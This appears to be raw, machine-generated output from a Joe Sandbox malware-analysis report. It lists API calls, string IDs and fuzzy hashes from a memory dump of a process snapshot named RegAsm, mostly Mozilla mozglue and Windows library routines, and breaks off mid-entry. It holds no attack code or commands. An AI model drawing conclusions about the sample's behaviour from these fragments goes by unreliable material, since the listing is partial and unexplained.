                                                                            • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 418114769-0
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC91800
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                            • String ID: Details$name${marker.name} - {marker.data.name}
                                                                            • API String ID: 46770647-1733325692
                                                                            APIs
                                                                            • free.MOZGLUE(?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?,?,6CC9AB1F), ref: 6CC9B1F2
                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?), ref: 6CC9B1FF
                                                                            • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010), ref: 6CC9B25F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$Xlength_error@std@@
                                                                            • String ID: map/set<T> too long
                                                                            • API String ID: 1922495194-1285458680
                                                                            APIs
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                              • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                              • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                            • String ID: MOZ_CRASH()
                                                                            • API String ID: 3805649505-2608361144
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv
                                                                            • String ID: -%llu$.$profiler-paused
                                                                            • API String ID: 3732870572-2661126502
                                                                            APIs
                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CCA985D
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CCA987D
                                                                            • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CCA98DE
                                                                            Strings
                                                                            • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CCA98D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                            • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                            • API String ID: 1778083764-3290996778
                                                                            APIs
                                                                            • __aulldiv.LIBCMT ref: 6CC84721
                                                                              • Part of subcall function 6CC34410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CC73EBD,00000017,?,00000000,?,6CC73EBD,?,?,6CC342D2), ref: 6CC34444
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldiv__stdio_common_vsprintf
                                                                            • String ID: -%llu$.$profiler-paused
                                                                            • API String ID: 680628322-2661126502
                                                                            APIs
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CC8B127), ref: 6CC8B463
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8B4C9
                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CC8B4E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _getpidstrlenstrncmptolower
                                                                            • String ID: pid:
                                                                            • API String ID: 1720406129-3403741246
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                            • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: SHGetKnownFolderPath$shell32
                                                                            • API String ID: 2574300362-1045111711
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7E577
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E584
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7E5DE
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC7E8A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                            • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                            • API String ID: 1483687287-53385798
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC4237F
                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC42B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80CD5
                                                                              • Part of subcall function 6CC6F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC6F9A7
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC80D40
                                                                            • free.MOZGLUE ref: 6CC80DCB
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            • free.MOZGLUE ref: 6CC80DDD
                                                                            • free.MOZGLUE ref: 6CC80DF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                            • String ID:
                                                                            • API String ID: 4069420150-0
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89188
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC891BB
                                                                            • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC891EB
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89200
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC88242,?,00000000,?,6CC7B63F), ref: 6CC89219
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: malloc$freememcpy
                                                                            • String ID:
                                                                            • API String ID: 4259248891-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70838
                                                                            • memset.VCRUNTIME140(?,00000000,00000158), ref: 6CC7084C
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CC708AF
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6CC708BD
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC708D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$memset
                                                                            • String ID:
                                                                            • API String ID: 837921583-0
                                                                            • Opcode ID: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                            • Instruction ID: 39ae6008f9ed7643583171aabc7496a9dcfe919a6608b4cbc146cc0712fa0887
                                                                            • Opcode Fuzzy Hash: b008cfe4aa988087f58539c963e756330ae642052d592b022067e3c10c3a95fb
                                                                            • Instruction Fuzzy Hash: FB21D3307002498BDF148FA5D899BAA73B9FF44708F50056CE509E7B41EF36A404CBE4
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDA4
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                              • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D158
                                                                              • Part of subcall function 6CC8D130: InitializeConditionVariable.KERNEL32(00000098,?,6CC8CDBA,00100000,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D177
                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CDC4
                                                                              • Part of subcall function 6CC87480: ReleaseSRWLockExclusive.KERNEL32(?,6CC915FC,?,?,?,?,6CC915FC,?), ref: 6CC874EB
                                                                            • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8CECC
                                                                              • Part of subcall function 6CC4CA10: mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                              • Part of subcall function 6CC7CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CC8CEEA,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000), ref: 6CC7CB57
                                                                              • Part of subcall function 6CC7CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6CC7CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CC8CEEA,?,?), ref: 6CC7CBAF
                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?,00000000,?), ref: 6CC8D058
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                            • String ID:
                                                                            • API String ID: 861561044-0
                                                                            • Opcode ID: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                            • Instruction ID: a4b3047f5ab0d4354d2a3f650595aede65e562d1021fb61ae604fd739148466b
                                                                            • Opcode Fuzzy Hash: 8c6d7a02d2532c262ac8904df474afb1b115183d4ed9a3890b872f5202e081f8
                                                                            • Instruction Fuzzy Hash: 51D16071A05B469FD708CF28C480B9AFBF1BF89308F01876DD95987711EB71A9A5CB81
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC417B2
                                                                            • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC418EE
                                                                            • free.MOZGLUE(?), ref: 6CC41911
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC4194C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                            • String ID:
                                                                            • API String ID: 3725304770-0
                                                                            • Opcode ID: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                            • Instruction ID: d1815c987ecd806101ffba3002799b50403689a775dde8e368535f40b8862961
                                                                            • Opcode Fuzzy Hash: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                            • Instruction Fuzzy Hash: B581B070A112159FCB08CF6CD8949AEBBB1FF89314F04C52CE895AB750E730E864CBA1
                                                                            APIs
                                                                            • GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • __aulldiv.LIBCMT ref: 6CC55DB4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                            • String ID:
                                                                            • API String ID: 557828605-0
                                                                            • Opcode ID: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                            • Instruction ID: ca4236de6147bb88d128acd82141a990248519c5041f7350cf996e8fa2e56c25
                                                                            • Opcode Fuzzy Hash: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                            • Instruction Fuzzy Hash: 2951907AE0011A8FCF08CFACC994AAEBBB1FF85304F19865DD811A7750D731A955CB94
                                                                            APIs
                                                                            • GetTickCount64.KERNEL32 ref: 6CC97250
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC97277
                                                                            • __aulldiv.LIBCMT ref: 6CC972C4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC972F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                            • String ID:
                                                                            • API String ID: 557828605-0
                                                                            • Opcode ID: 1a6420035a5884c86aa7046053938f155220aa1ccc689d63c4a72ea2b452f717
                                                                            • Instruction ID: 6faf68478f81235f56aabc54f3e674c8ca6dafe71187bc28cd5056258af30321
                                                                            • Opcode Fuzzy Hash: 1a6420035a5884c86aa7046053938f155220aa1ccc689d63c4a72ea2b452f717
                                                                            • Instruction Fuzzy Hash: FF516D79E0112ACFCF08CFA8C895AAEBBB1FB89304F15861DDC15A7750D730A945CB95
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3CEBD
                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC3CEF5
                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC3CF4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: 0
                                                                            • API String ID: 438689982-4108050209
                                                                            • Opcode ID: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                            • Instruction ID: 8ac224a142176f0fe784745d2793a67879c34ea292a3693b6c4ec1a3e5824e3b
                                                                            • Opcode Fuzzy Hash: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                            • Instruction Fuzzy Hash: 90511575A002668FCB00CF19D890A9AB7B5FF99304F19869DD8595F391E731ED06CBE0
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC977FA
                                                                            • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC97829
                                                                              • Part of subcall function 6CC6CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC331A7), ref: 6CC6CC45
                                                                              • Part of subcall function 6CC6CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC331A7), ref: 6CC6CC4E
                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC9789F
